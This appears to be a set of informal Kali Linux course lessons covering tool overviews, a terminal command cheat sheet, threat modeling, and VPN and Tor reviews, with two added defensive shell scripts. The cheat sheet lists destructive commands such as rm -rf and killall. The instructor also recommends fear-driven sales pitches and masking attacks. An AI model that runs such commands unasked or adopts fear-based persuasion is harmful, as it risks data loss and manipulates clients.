Lesson 1: Introduction to Kali Linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security Ltd. It was developed by Mati Aharoni and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous forensics Linux distribution.

Kali Linux is preinstalled with numerous penetration-testing programs, including nmap (a port scanner), Wireshark (a packet analyzer), John the Ripper (a password cracker), Aircrack-ng (a software suite for penetration-testing wireless LANs), Burp Suite and OWASP ZAP (both web application security scanners). Kali Linux can run natively when installed on a computer's hard disk, can be booted from a live CD or live USB, or it can run within a virtual machine. It is a supported platform of the Metasploit Project's Metasploit Framework, a tool for developing and executing security exploits.

From the Kali website: Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.

Kali Linux Features

Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards. All-new infrastructure has been put in place, all tools were reviewed and packaged, and we use Git for our VCS.

- More than 300 penetration testing tools: After reviewing every tool that was included in BackTrack, we eliminated a great number of tools that either did not work or had other tools available that provided similar functionality.
- Free and always will be: Kali Linux, like its predecessor, is completely free and always will be. You will never, ever have to pay for Kali Linux.
- Open source Git tree: We are huge proponents of open source software and our development tree is available for all to see, and all sources are available for those who wish to tweak and rebuild packages.
- FHS compliant: Kali has been developed to adhere to the Filesystem Hierarchy Standard, allowing all Linux users to easily locate binaries, support files, libraries, etc.
- Vast wireless device support: We have built Kali Linux to support as many wireless devices as we possibly can, allowing it to run properly on a wide variety of hardware and making it compatible with numerous USB and other wireless devices.
- Custom kernel patched for injection: As penetration testers, the development team often needs to do wireless assessments, so our kernel has the latest injection patches included.
- Secure development environment: The Kali Linux team is made up of a small group of trusted individuals who can only commit packages and interact with the repositories while using multiple secure protocols.
- GPG signed packages and repos: All Kali packages are signed by each individual developer when they are built and committed, and the repositories subsequently sign the packages as well.
- Multi-language: Although pentesting tools tend to be written in English, we have ensured that Kali has true multilingual support, allowing more users to operate in their native language and locate the tools they need for the job.
- Completely customizable:
- ARMEL and ARMHF support: Since ARM-based systems are becoming more and more prevalent and inexpensive, we knew that Kali's ARM support would need to be as robust as we could manage, resulting in working installations for both ARMEL and ARMHF systems. Kali Linux has ARM repositories integrated with the mainline distribution, so tools for ARM will be updated in conjunction with the rest of the distribution.

Kali is currently available for the following ARM devices:
- rk3306 mk/ss808
- Raspberry Pi
- ODROID U2/X2
- Samsung Chromebook
- EfikaMX
- Beaglebone Black
- CuBox
- Galaxy Note 10.1
Okay class, it's important to realize that most of the tools in Kali are launched from a GUI (graphical user interface), unlike previous installations of BackTrack, which required terminal input. The terminal is like the Windows command prompt, with one difference you will be quick to notice: Windows file paths use a backslash \ while in the Linux environment the slash is a forward slash /.

***Important*** File paths are case sensitive, and when launching a program you also have to type the extension. Ex. Root/user/admin/torhammer.py
If you had the above program installed, the extension being ".py", that would launch the program.

Another cool thing about Kali, and Linux in general, is that if and when you learn a programming language, you can code your own programs in its "notepad" style editor and save the file as something like "hacklikeaboss.py"; it will be saved as a Python file. Then right click, change the advanced settings to make it an executable file, andddddd voila! Your very own custom program has been created.

Enough about Kali, I'm sure you're ready to get started on lesson 2.

Lesson 2: Real World applications for Kali, forming your own business, and introduction to the terminal, the hacker's best friend.

Lesson 2: Real World Applications for Kali Linux

Greetings class: Real world applications for Kali Linux are very diverse. Incorporating them into your repertoire as a sales pitch is crucial to forming a thriving business model that will generate revenue for you and your company.

Small business examples: Every 9 seconds a personal computer is hacked. Thousands of people either own their own business or work from home. These are the businesses you will start with at first to build a reputation. Stressing the importance of data security to the customer is an integral part of the sales pitch. Looking up articles about local businesses around your area, and even college databases being breached, can not only raise awareness but also raise the fear factor. Ever heard the term "a little fear is healthy"?
Well, fear sells, and in today's day and age everyone is digital. Some people run their business sites via WordPress and even blog on them daily about events. This consumes a good portion of the client's time, and if someone were to gain access because of a faulty line of code in the site, the client could not only lose their investment but lose customers and customer data as well. A Kali Linux application for this would be a tool called wpscan, which we will review later on; it scans the site for vulnerabilities, allowing you to report them to the sitemaster or admin. It's illegal to scan without permission; always get permission.

Another tool to use would be nmap. This tool scans the network you are connected to (wifi included) for open ports. Open ports are like open doors that anyone with the right knowledge can walk through, and behind them sit things like customer data and even credit card transaction information.

You will find when launching these programs via the drop down menu that they open a sort of command prompt via a program called the terminal. Kali is already preconfigured to run as root, so a tutorial on sudo isn't necessary. The terminal accepts your commands and runs basically every function on Kali, and this is where you will spend most of your time.
Every time you start Kali, if it's a live disk and not a full install, I recommend opening up a terminal first thing. Then type:

apt-get update

This refreshes the package lists from the repositories. You can then install upgraded versions of the installed software:

apt-get upgrade

Other commands are listed below.

System Info
date – Show the current date and time
cal – Show this month's calendar
uptime – Show current uptime
w – Display who is online
whoami – Who you are logged in as
finger user – Display information about user
uname -a – Show kernel information
cat /proc/cpuinfo – CPU information
cat /proc/meminfo – Memory information
df -h – Show disk usage
du – Show directory space usage
free – Show memory and swap usage

Keyboard Shortcuts
Enter – Run the command
Up Arrow – Show the previous command
Ctrl + R – Allows you to type a part of the command you're looking for and finds it
Ctrl + Z – Stops the current command; resume with fg in the foreground or bg in the background
Ctrl + C – Halts the current command, cancels the current operation and/or starts with a fresh new line
Ctrl + L – Clear the screen
command | less – Allows scrolling of the command output using Shift + Up Arrow and Shift + Down Arrow
!! – Repeats the last command
!$ – Repeats the last argument of the previous command
Esc + . (a period) – Insert the last argument of the previous command on the fly, which enables you to edit it before executing the command
Ctrl + A – Return to the start of the command you're typing
Ctrl + E – Go to the end of the command you're typing
Ctrl + U – Cut everything before the cursor to a special clipboard; erases the whole line
Ctrl + K – Cut everything after the cursor to a special clipboard
Ctrl + Y – Paste from the special clipboard that Ctrl + U and Ctrl + K save their data to
Ctrl + T – Swap the two characters before the cursor (you can actually use this to transport a character from the left to the right, try it!)
Ctrl + W – Delete the word / argument left of the cursor in the current line
Ctrl + D – Log out of current session, similar to exit

Learn the Commands
apropos subject – List manual pages for subject
man -k keyword – Display man pages containing keyword
man command – Show the manual for command
man -t man | ps2pdf - > man.pdf – Make a PDF of a manual page
which command – Show full path name of command
time command – See how long a command takes
whereis app – Show possible locations of app
which app – Show which app will be run by default; it shows the full path

Searching
grep pattern files – Search for pattern in files
grep -r pattern dir – Search recursively for pattern in dir
command | grep pattern – Search for pattern in the output of command
locate file – Find all instances of file
find / -name filename – Starting with the root directory, look for the file called filename
find / -name "*filename*" – Starting with the root directory, look for files whose name contains the string filename
locate filename – Find a file called filename using the locate command; this assumes you have already used the command updatedb (see next)
updatedb – Create or update the database of files on all file systems attached to the Linux root directory
which filename – Show the subdirectory containing the executable file called filename
grep -r TextStringToFind /dir – Starting with the directory called dir, look for and list all files containing TextStringToFind (the -r is needed, since grep on a directory without it only reports "Is a directory")

File Permissions
chmod octal file – Change the permissions of file to octal, which is built separately for user, group, and world by adding: 4 – read (r), 2 – write (w), 1 – execute (x)
Examples:
chmod 777 file – read, write, execute for all
chmod 755 file – rwx for owner, rx for group and world
For more options, see man chmod.
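The octal scheme above is easy to get wrong in the permissive direction: a 777 file is one that any user on the box can rewrite. The following script is an added example, not part of the lesson; it decodes the 4/2/1 digits and uses find -perm to locate world-writable files and group/world-readable key material in a constructed temporary tree (all file names and modes are made up for the demonstration, nothing on the real system is touched).

```shell
#!/bin/sh
# Added example (not from the original lesson): decode chmod octal digits and
# audit a directory tree for over-permissive modes. The tree is constructed
# under a temporary directory and removed again.
set -eu

# Turn one octal digit into its rwx triplet: 4=r, 2=w, 1=x, summed.
octal_digit_to_rwx() {
  case $1 in
    0) printf '%s' '---' ;; 1) printf '%s' '--x' ;; 2) printf '%s' '-w-' ;; 3) printf '%s' '-wx' ;;
    4) printf '%s' 'r--' ;; 5) printf '%s' 'r-x' ;; 6) printf '%s' 'rw-' ;; 7) printf '%s' 'rwx' ;;
    *) printf 'invalid octal digit: %s\n' "$1" >&2; return 1 ;;
  esac
}

# Turn a three-digit mode such as 755 into the ls-style string rwxr-xr-x
# (user, group, world, in that order). Anything that is not three octal
# digits is rejected.
octal_to_rwx() {
  mode=$1
  case $mode in
    [0-7][0-7][0-7]) ;;
    *) printf 'expected three octal digits, got: %s\n' "$mode" >&2; return 1 ;;
  esac
  u=$(octal_digit_to_rwx "${mode%??}")   # first digit: user
  rest=${mode#?}
  g=$(octal_digit_to_rwx "${rest%?}")    # second digit: group
  o=$(octal_digit_to_rwx "${rest#?}")    # third digit: world
  printf '%s%s%s\n' "$u" "$g" "$o"
}

# Build a constructed sample tree and print its path. The modes mirror the
# cheat-sheet examples: 777 (everyone may write) versus 755, 644 and 600.
make_sample_tree() {
  dir=$(mktemp -d)
  mkdir "$dir/scripts" "$dir/keys"
  printf '#!/bin/sh\necho deploy\n' > "$dir/scripts/deploy.sh"
  printf '#!/bin/sh\necho backup\n' > "$dir/scripts/backup.sh"
  printf 'constructed secret, not a real key\n' > "$dir/keys/id_rsa"
  printf 'notes\n' > "$dir/README"
  chmod 777 "$dir/scripts/deploy.sh"   # world-writable: anyone can edit what runs
  chmod 755 "$dir/scripts/backup.sh"   # rwx for owner, rx for group and world
  chmod 600 "$dir/keys/id_rsa"         # private key: owner only
  chmod 666 "$dir/README"              # world-writable data file
  printf '%s\n' "$dir"
}

# List regular files under $1 that any user may write to. -perm -0002 matches
# when the write bit of the world digit is set, whatever the other bits are.
find_world_writable() {
  find "$1" -type f -perm -0002 | sort
}

# Count the findings so the result can be checked or fed into a report.
count_world_writable() {
  find_world_writable "$1" | wc -l | tr -d ' '
}

# Files under a directory named keys that group (0040) or world (0004) can
# read. Assumption for this example: key material must be owner-only.
find_readable_keys() {
  find "$1" -path '*/keys/*' -type f \( -perm -0040 -o -perm -0004 \) | sort
}

# Stand-alone run: decode two modes, build the tree, audit it, clean up.
main() {
  tree=$(make_sample_tree)
  printf 'mode 777 = %s\n' "$(octal_to_rwx 777)"
  printf 'mode 755 = %s\n' "$(octal_to_rwx 755)"
  printf 'world-writable files under %s:\n' "$tree"
  find_world_writable "$tree"
  rm -rf "$tree"
}
main
```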
File Commands
ls – Directory listing
ls -l – List files in current directory using long format
ls -laC – List all files in current directory in long format and display in columns
ls -F – List files in current directory and indicate the file type
ls -al – Formatted listing with hidden files
cd dir – Change directory to dir
cd – Change to home
mkdir dir – Create a directory dir
pwd – Show current directory
rm name – Remove a file or directory called name
rm -r dir – Delete directory dir
rm -f file – Force remove file
rm -rf dir – Force remove an entire directory dir and all its included files and subdirectories (use with extreme caution)
cp file1 file2 – Copy file1 to file2
cp -r dir1 dir2 – Copy dir1 to dir2; create dir2 if it doesn't exist
cp file /home/dirname – Copy the file called file to the /home/dirname directory
mv file /home/dirname – Move the file called file to the /home/dirname directory
mv file1 file2 – Rename or move file1 to file2; if file2 is an existing directory, moves file1 into directory file2
ln -s file link – Create symbolic link link to file
touch file – Create or update file
cat > file – Places standard input into file
cat file – Display the file called file
more file – Display the file called file one page at a time; proceed to the next page using the spacebar
head file – Output the first 10 lines of file
head -20 file – Display the first 20 lines of the file called file
tail file – Output the last 10 lines of file
tail -20 file – Display the last 20 lines of the file called file
tail -f file – Output the contents of file as it grows, starting with the last 10 lines

Compression
tar cf file.tar files – Create a tar named file.tar containing files
tar xf file.tar – Extract the files from file.tar
tar czf file.tar.gz files – Create a tar with Gzip compression
tar xzf file.tar.gz – Extract a tar using Gzip
tar cjf file.tar.bz2 files – Create a tar with Bzip2 compression
tar xjf file.tar.bz2 – Extract a tar using Bzip2
gzip file – Compresses file and renames it to file.gz
gzip -d file.gz – Decompresses file.gz back to file

Printing
/etc/rc.d/init.d/lpd start – Start the print daemon
/etc/rc.d/init.d/lpd stop – Stop the print daemon
/etc/rc.d/init.d/lpd status – Display status of the print daemon
lpq – Display jobs in print queue
lprm – Remove jobs from queue
lpr – Print a file
lpc – Printer control tool
man subject | lpr – Print the manual page called subject as plain text
man -t subject | lpr – Print the manual page called subject as PostScript output
printtool – Start X printer setup interface

Network
ifconfig – List IP addresses for all devices on the local machine
iwconfig – Used to set the parameters of the network interface which are specific to wireless operation (for example: the frequency)
iwlist – Used to display some additional information from a wireless network interface that is not displayed by iwconfig
ping host – Ping host and output results
whois domain – Get whois information for domain
dig domain – Get DNS information for domain
dig -x host – Reverse lookup host
wget file – Download file
wget -c file – Continue a stopped download

SSH
ssh user@host – Connect to host as user
ssh -p port user@host – Connect to host on port port as user
ssh-copy-id user@host – Add your key to host for user to enable a keyed or passwordless login

User Administration
adduser accountname – Create a new user called accountname
passwd accountname – Give accountname a new password
su – Log in as superuser from current login
exit – Stop being superuser and revert to normal user

Process Management
ps – Display your currently active processes
top – Display all running processes
kill pid – Kill process id pid
killall proc – Kill all processes named proc (use with extreme caution)
bg – Lists stopped or background jobs; resume a stopped job in the background
fg – Brings the most recent job to foreground
fg n – Brings job n to the foreground

Installation from source
./configure
make
make install
dpkg -i pkg.deb – Install a DEB package (Debian / Ubuntu / Linux Mint)
rpm -Uvh pkg.rpm – Install an RPM package (Red Hat / Fedora)

Stopping & Starting
shutdown -h now – Shutdown the system now and do not reboot
halt – Stop all processes - same as above
shutdown -r 5 – Shutdown the system in 5 minutes and reboot
shutdown -r now – Shutdown the system now and reboot
reboot – Stop all processes and then reboot - same as above
startx – Start the X system

Lesson 3: Threat assessment and how to sell it

Good morning class, I hope you have had time to experiment with terminal commands and familiarize yourselves with the file structure of Kali Linux. Fear sells, 100 percent of the time. It's this fear that drives us to protect ourselves against the unknown. It's this fear that tells us money isn't a factor when it comes to protecting our investments. So, in short, today's lesson will be on threat assessment.

Now for a little roleplay. Company XYZ is a Fortune 500 company that buys and trades domains on the market, processes credit cards and bank transactions, stores customer information on encrypted servers, and has an option for member sign up. You ask them and they say they are running SQL databases. How would you approach the company to sell your business? Respond to this email with your answer. My answer will be included in lesson 4.

Now on to threat assessment.

Threat Modeling

There is no single solution for keeping yourself safe online. Digital security isn't about which tools you use; rather, it's about understanding the threats you face and how you can counter those threats. To become more secure, you must determine what you need to protect, and whom you need to protect it from. Threats can change depending on where you're located, what you're doing, and whom you're working with. Therefore, in order to determine what solutions will be best for you, you should conduct a threat modeling assessment.
When conducting an assessment, there are five main questions you should ask yourself:
- What do you want to protect?
- Who do you want to protect it from?
- How likely is it that you will need to protect it?
- How bad are the consequences if you fail?
- How much trouble are you willing to go through in order to try to prevent those?

When we talk about the first question, we often refer to assets, or the things that you are trying to protect. An asset is something you value and want to protect. When we are talking about digital security, the assets in question are usually information. For example, your emails, contact lists, instant messages, and files are all assets. Your devices are also assets. Write down a list of data that you keep, where it's kept, who has access to it, and what stops others from accessing it.

In order to answer the second question, "Who do you want to protect it from," it's important to understand who might want to target you or your information, or who is your adversary. An adversary is any person or entity that poses a threat against an asset or assets. Examples of potential adversaries are your boss, your government, or a hacker on a public network. Make a list of who might want to get ahold of your data or communications. It might be an individual, a government agency, or a corporation.

A threat is something bad that can happen to an asset. There are numerous ways that an adversary can threaten your data. For example, an adversary can read your private communications as they pass through the network, or they can delete or corrupt your data. An adversary could also disable your access to your own data. The motives of adversaries differ widely, as do their attacks. A government trying to prevent the spread of a video showing police violence may be content to simply delete or reduce the availability of that video, whereas a political opponent may wish to gain access to secret content and publish it without you knowing.
Write down what your adversary might want to do with your private data.

The capability of your attacker is also an important thing to think about. For example, your mobile phone provider has access to all of your phone records and therefore has the capability to use that data against you. A hacker on an open Wi-Fi network can access your unencrypted communications. Your government might have stronger capabilities.

A final thing to consider is risk. Risk is the likelihood that a particular threat against a particular asset will actually occur, and goes hand-in-hand with capability. While your mobile phone provider has the capability to access all of your data, the risk of them posting your private data online to harm your reputation is low.

It is important to distinguish between threats and risks. While a threat is a bad thing that can happen, risk is the likelihood that the threat will occur. For instance, there is a threat that your building might collapse, but the risk of this happening is far greater in San Francisco (where earthquakes are common) than in Stockholm (where they are not).

Conducting a risk analysis is both a personal and a subjective process; not everyone has the same priorities or views threats in the same way. Many people find certain threats unacceptable no matter what the risk, because the mere presence of the threat at any likelihood is not worth the cost. In other cases, people disregard high risks because they don't view the threat as a problem. In a military context, for example, it might be preferable for an asset to be destroyed than for it to fall into enemy hands. Conversely, in many civilian contexts, it's more important for an asset such as email service to be available than confidential.

Now, let's practice threat modeling.
If you want to keep your house and possessions safe, here are a few questions you might ask:
- Should I lock my door?
- What kind of lock or locks should I invest in?
- Do I need a more advanced security system?
- What are the assets in this scenario? The privacy of my home; the items inside my home.
- What is the threat? Someone could break in.
- What is the actual risk of someone breaking in? Is it likely?

Once you have asked yourself these questions, you are in a position to assess what measures to take. If your possessions are valuable, but the risk of a break-in is low, then you probably won't want to invest too much money in a lock. On the other hand, if the risk is high, you'll want to get the best locks on the market, and perhaps even add a security system.

Lesson 4: Opsec, VPN, Tor.

Opsec stands for "operational security" and is a term coined by the special forces in the United States military. When it comes to hacking, Opsec is essential so as not to let your opponent know that you are on to them. If you are hired to test the security already in place, it is obvious that you will need to learn ways to mask your attacks.

Virtual Private Networks or VPNs:

What Is A VPN?

A VPN (Virtual Private Network) provides a secure way of connecting through a public network (such as the Internet) to a remote network/location. This remote network is typically a private network, such as a workplace or home network, or one provided by a commercial VPN service. A VPN can be thought of as creating a "tunnel" through the public network to your private network at the other end. All network traffic through this tunnel is encrypted to ensure it is kept secure and private.

What Does A VPN Let Me Do?

A VPN allows you to do a number of things you wouldn't otherwise be able to do when connected to a standard network. This includes:

Network Security & Privacy: All network traffic through your VPN connection is kept secure.
This allows you to use public networks (such as at hotels, conferences, coffee shops, etc.) and wireless networks knowing your network traffic is kept safe and secure. Otherwise it is relatively easy for other people to view your network traffic, such as seeing what you are viewing, stealing your information and login details, etc.

Access Your Workplace Remotely: You can connect to your workplace's VPN and have access as if you were physically in the office. You can then do things like access file servers, computers, databases, email, internal webpages, and other services you might not have access to outside of your work network.

Access Your Home Network: Connecting back home using a VPN allows you to access your computers remotely. Access files on your computer, view iTunes shares, take remote control of your computer, and access other services.

Access Location Restricted Content: By connecting to a VPN server in another location you can make it appear to websites using geolocation that you are physically in the correct location for access. So when you're travelling overseas you can still view websites you would normally use at home, such as television, movie and music streaming websites.

Bypass Restrictive Networks: Some networks may restrict access to the web services that can be accessed, meaning that many applications like VOIP, instant messaging, video chat, and games will not work. However, using a VPN you can tunnel through such restrictions and allow all of your network applications to work. Viscosity even allows you to tunnel through an HTTP or SOCKS proxy to establish your VPN connection.

Escape Censorship: VPNs allow you to bypass restrictive censorship and access websites and services that would otherwise be blocked. Some countries impose censorship on Internet access while in that country, and a VPN provides a way to still maintain access to the services you would normally use.

Why Should I Use A VPN?
Even if you have no desire to be able to access a private network remotely, a VPN is vital to ensure the security and privacy of your network traffic. Public networks, and in particular public wireless networks, provide an easy way for hackers and malicious users to listen in ("sniff") on your network usage. This may allow them to see what web pages you are viewing, steal usernames and passwords, steal session information to be able to log into sites as you, and extract other private data. In addition, skilled hackers may perform a "man in the middle" attack. This allows them to not only monitor your network traffic in depth, but also alter your traffic or inject their own in an attempt to fool a user into revealing important data. Using a VPN protects you from such attacks, as your network traffic is authenticated and encrypted, making it secure and private.

How Does A VPN Work?

A typical VPN consists of two components: the VPN client and the VPN server.

A VPN client is the software that allows a user to connect their computer to the VPN server and establish the VPN connection. It is installed on the user's computer and communicates with the VPN server to create a secure link for the user's network traffic. The VPN client is what the end user uses to control their VPN connection. Viscosity performs the duties of a VPN client.

A VPN server is set up at the location users want to connect to, such as at a workplace or at home. A VPN server is usually configured and maintained by IT staff; however, home users often set up their own personal VPN server at home or at a remote location as well. End users rarely have to interact with the VPN server. A VPN server will also perform authentication to ensure only registered users can connect to the VPN.

All network traffic through the tunnel created between the VPN client and the VPN server is encrypted to keep it private and secure.

What Is OpenVPN?

OpenVPN is a popular VPN protocol that is based on SSL/TLS encryption.
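The authentication and encryption described above only hold if the client config actually asks for them: a config that merely connects will happily accept any certificate the CA signed and whatever the server proposes. As an added example (not from the lesson, Viscosity or the OpenVPN project), the following script lints two constructed OpenVPN client configs, a bare one and a hardened one, for the directives that pin the server's identity and fix the crypto. The hostname, key file names and the directive list are assumptions based on OpenVPN 2.4 syntax.

```shell
#!/bin/sh
# Added example (not from the original lesson): a small linter for OpenVPN
# client configs. Two constructed configs are written to a temporary directory
# and checked for the directives that make the tunnel authenticate the server
# and use explicit, modern crypto. vpn.example.com and the key file names are
# placeholders.
set -eu

# Directives whose absence weakens a client config (OpenVPN 2.4 syntax):
#   remote-cert-tls  - reject a server cert that is not marked for server use,
#                      so another client's cert from the same CA cannot pose as
#                      the server
#   tls-auth         - HMAC-sign the TLS handshake; unsigned packets are dropped
#   cipher / auth    - explicit cipher and HMAC instead of relying on defaults
#                      (with an AEAD cipher such as AES-256-GCM, auth applies
#                      to the tls-auth control channel)
#   tls-version-min  - refuse TLS 1.0/1.1 handshakes
REQUIRED_DIRECTIVES="remote-cert-tls tls-auth cipher auth tls-version-min"

# Print the required directives missing from the config in $1 (space
# separated) and return 1 if any are missing, 0 if all are present.
check_ovpn_config() {
  missing=""
  for directive in $REQUIRED_DIRECTIVES; do
    # Anchored at line start and followed by whitespace or end of line, so
    # "auth" does not match "auth-user-pass" or "tls-auth", and a commented
    # "# remote-cert-tls server" line does not count.
    pattern='^[[:space:]]*'"$directive"'([[:space:]]|$)'
    if ! grep -Eq "$pattern" "$1"; then
      missing="$missing $directive"
    fi
  done
  missing=${missing# }
  printf '%s\n' "$missing"
  [ -z "$missing" ]
}

# Write the two constructed configs and print the directory holding them.
write_sample_configs() {
  dir=$(mktemp -d)
  cat > "$dir/weak.ovpn" <<'EOF'
# Constructed "it connects" config: no server identity check, default crypto.
client
dev tun
proto udp
remote vpn.example.com 1194
ca ca.crt
cert client.crt
key client.key
auth-user-pass
# remote-cert-tls server
EOF
  cat > "$dir/hardened.ovpn" <<'EOF'
# Constructed hardened config: same tunnel, server identity pinned, crypto fixed.
client
dev tun
proto udp
remote vpn.example.com 1194
ca ca.crt
cert client.crt
key client.key
auth-user-pass
remote-cert-tls server
verify-x509-name vpn.example.com name
tls-auth ta.key 1
tls-version-min 1.2
cipher AES-256-GCM
auth SHA256
EOF
  printf '%s\n' "$dir"
}

# Stand-alone run: lint both configs and report, then clean up.
main() {
  cfgdir=$(write_sample_configs)
  for f in weak hardened; do
    if result=$(check_ovpn_config "$cfgdir/$f.ovpn"); then
      printf '%s.ovpn: ok\n' "$f"
    else
      printf '%s.ovpn: missing %s\n' "$f" "$result"
    fi
  done
  rm -rf "$cfgdir"
}
main
```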
Like IPSec and PPTP, OpenVPN handles the connection between the VPN client and server. OpenVPN is rapidly gaining in popularity thanks to its high level of security, customizability, and compatibility with most network environments.

VPN Service Providers

There are many companies that specialize in providing a commercial VPN service. These companies are known as "VPN Service Providers". VPN Service Providers often have servers in multiple countries, allowing you to not only get the security and privacy benefits of a VPN, but also making it easy to access websites that restrict access to certain countries. Most VPN Service Providers charge a small monthly or yearly fee for access to their servers; however, there are also a number of free service providers.

The key to choosing a quality VPN comes down to two factors: 1) do they cooperate with United States government subpoenas, and 2) do they keep logs (you don't want logs).

TorGuard

TorGuard's claim to fame is that they offer specific types of servers for different activities. That gives you the ability to connect to torrent-friendly servers if you need to download something, encryption and anonymity-friendly servers if you just need a little privacy and security, and so on. They're also one of the few VPN service providers to take DNS leaking seriously, and they even offer their own test to make sure that your VPN—even if you don't use them—isn't leaking DNS and thus information you thought was secure. Depending on your usage habits and patterns, TorGuard has different plans for you. For our purposes though, their full VPN service will set you back $10/mo or $60/yr, and they have less expensive plans if you just want an anonymous proxy or a torrent proxy.
Their full VPN service, however, features over 200 exit servers in 18 countries, no logging or data retention of any kind, and their network is set up in a way that they actually have no information to collect on their user activities—they don't know what you're doing or when you're connected. They delivered a really great response to Torrentfreak's questions that's well worth a read for more info. They also support multiple connectivity protocols, support virtually every desktop and mobile OS, and even offer their customers encrypted, offshore email service if you want to take advantage. Those of you who praised TorGuard in the call for contenders thread noted that they have "Stealth" VPN servers to protect you against deep packet inspection (a technique used to capture and systematically decrypt or inspect encrypted data, usually used by corporate networks, university networks, or specific "agencies"). You also noted that they support OpenVPN, help you get connected via your home network, and have great customer service.

IPVanish VPN

IPVanish takes an interesting approach to privacy and security. They use shared IP addresses, so when they say no one has any idea what you're doing when you're connected, they mean it. That doesn't mean they're compromising security though—they have over 14,0000 IPs to share on over a hundred exit servers in 47 different countries. You can choose where you'd prefer to connect, which again is perfect for getting around location restrictions, and their encryption makes sure your traffic is safe from prying eyes. They support OS X, Windows, and Ubuntu (although it wouldn't be too hard to stretch that to other distributions), along with iOS and Android, and they offer configuration utilities so you can set your home router to connect to them as well. They feature multiple connection protocols, don't discriminate against traffic types or port usage, don't monitor your activities, and only log a few things.
Torrentfreak gave them the nod as well. Accounts with IPVanish are $10/mo or $78/yr, and you can connect two devices at once (as long as they're using different protocols). IPVanish earned high praise in the call for contenders thread for its speed while connected. How they manage to do it is impressive, but the service manages to hold itself to a high standard of privacy and security while giving you breakneck speeds that you may not be accustomed to with a VPN. The service proudly notes that they're happy with you streaming video or music while you're connected to get around pesky content blocks, especially if you're an expat who's currently abroad but wishes they could see their favorite TV shows back home or make use of their streaming music subscription.

CyberGhost VPN

CyberGhost has been around for a long time, and they made a great showing in the call for contenders thread. Like any good, trustworthy VPN provider, they both encrypt all of the data that passes through your connection and anonymize your location. They offer free and paid subscription plans, so if you just need a little security on the go, you may be able to get away with a free account. The service just went through a massive overhaul about a year ago, where they removed traffic and bandwidth restrictions for free accounts, and improved security from the ground up. CyberGhost doesn't log any traffic, and they don't monitor what you're doing while you're connected. They do retain some information, but not much. They offer your choice of exit servers in 23 different countries (free users can pick from one of 14, still impressive for a free service), and you can see server status at any time. Their clients are easy to use, support virtually every mobile and desktop platform, and they don't discriminate against traffic types, protocols, or IP addresses (in fact, they just donated 10,000 licenses to users in Turkey to get around their location-blocks).
The only major difference between free and pro CyberGhost accounts is that free accounts disconnect after 3 hours and are limited to the official client, while pro accounts can use other connection protocols and have way more servers in more countries to choose from. You'll pay $7/mo or $40/yr for a premium account, but if you need more than one device connected at any given time, you'll need to step up to Premium Plus, at $11/mo and $70/yr. Those of you who praised the service noted their great connection speeds and wealth of servers to choose from (even for free users). Read more in the nomination thread here.

Do-It-Yourself

Of course, no list of great options would be complete without the DIY approach. If you don't need exit servers in different countries, and your primary need is to encrypt and secure your data when you're away from home, you can roll your own VPN with OpenVPN or a number of other free, open-source tools. Many of the best routers on the market support OpenVPN out of the box, and even if they don't, the DD-WRT or Tomato firmwares do, so if you can install those on your router, you'll be all set. The beauty of a home-rolled VPN is that you get to set the level of encryption, you get complete control over who connects and who has access to what parts of your home network, and where your data goes from there. Of course, this setup is best for people traveling who want to encrypt their data while they're on the go, but with a couple of friends, it's easy to set up a mesh network that would get you around content restrictions and port blocks. Similarly, advanced users can fire up a VPN on their preferred host or VPS provider and keep their VPN running there while they connect to it when necessary. The sky's the limit with the DIY option; it just takes the skill and know-how to do it, and some compromise on the level of features and tools you get.
We have more than a few honorable mentions this week, including one of my personal favorites, Hideman VPN, for their cross-platform, mobile-friendly, no-logging VPN service—complete with free VPN options for people just looking for a little security on the go without shelling out for a premium service. Also noteworthy are the great people over at Tunnelbear, who are constantly working to improve and update their service to help you get around regional restrictions and blocks, and who recently unveiled a browser add-on to tunnel some services but not others, giving you even more control over your connection. We'll also give the nod to AirVPN, a popular pick that packs in way more features than you might possibly need. You can forward remote ports, pick and choose exit servers in multiple countries, and even generate an OpenVPN config through their wizard to connect your home network to their service all the time—oh, and they don't log, don't discriminate against protocols, and they have no idea when you're connected. If you're looking to walk the line between a truly DIY option and a VPN that you roll at home, configure, and then connect to externally, they're worth a look. We should also highlight VyprVPN, which was a really tough call. VyprVPN is owned by the same company that owns Giganews, the Usenet service provider. You can use VyprVPN as a stand-alone VPN client, but you'll sign up for Giganews when you get it. They did very well in the call for contenders thread—although many of their votes were from first-time accounts—and they certainly talk the talk on privacy issues. They have multiple exit servers in multiple countries, strong encryption, and they're improving their service all the time. However, they have a history of logging user data, sometimes a lot of user data, and at the very least they log user sessions and data for troubleshooting, acceptable use issues, and more for up to 90 days.
That's not an issue if you don't care about logging, but they were cagey with Torrentfreak back in 2011 on the topic, cagey with me when I last spoke to a rep from the company, and this Reddit thread is rather illuminating as well. Still, there are signs that things may be changing with VyprVPN. The feature set and the face of the company both look good, and they combine Usenet with VPN services, which is great, but we don't feel comfortable calling them one of the best if we can't verify their commitment to your privacy and anonymity as well as the security of your data. A final note—something we mentioned when we talked—don't fall into the geography trap, assuming that an overseas VPN or one outside your country is somehow safer or more committed to privacy than ones based in your own or subject to your own laws. A local VPN that doesn't keep logs and has none to turn over is more trustworthy than an overseas VPN that logs everything and is happy to turn your data over to anyone who asks—and there are definitely VPN providers that fall in both categories.

Tor — a privacy-oriented encrypted anonymizing service — has announced the launch of the next version of its Tor Browser Bundle, Tor version 4.0.4, mostly intended to improve the built-in utilities and the privacy and security of online users. Tor Browser helps users browse the Internet in a completely anonymous way. The powerful Tor Browser Bundle, an anonymous web browser developed by the Tor Project, received some updates in its software. Tor Browser Bundle is basically an Internet browser based on Mozilla Firefox, configured to protect the users' anonymity via Tor and Vidalia. The anonymity suite also includes 3 Firefox extensions: Torbutton, NoScript and HTTPS-Everywhere.
NEW FEATURES
The latest version, Tor Browser Bundle 4.0.4, has recently been released, with a small number of new features:
- Updated Firefox to 31.5.0esr with important security updates
- Updated OpenSSL to 1.0.1l
- Updated NoScript to 2.6.9.15
- Updated HTTPS-Everywhere to 4.0.3

BUG FIXES
Meanwhile, the new Tor version 4.0.4 also includes some bug fixes:
- Bug 14203: Prevent meek from displaying an extra update notification
- Bug 14849: Remove new NoScript menu option to make permissions permanent
- Bug 14851: Set NoScript pref to disable permanent permissions

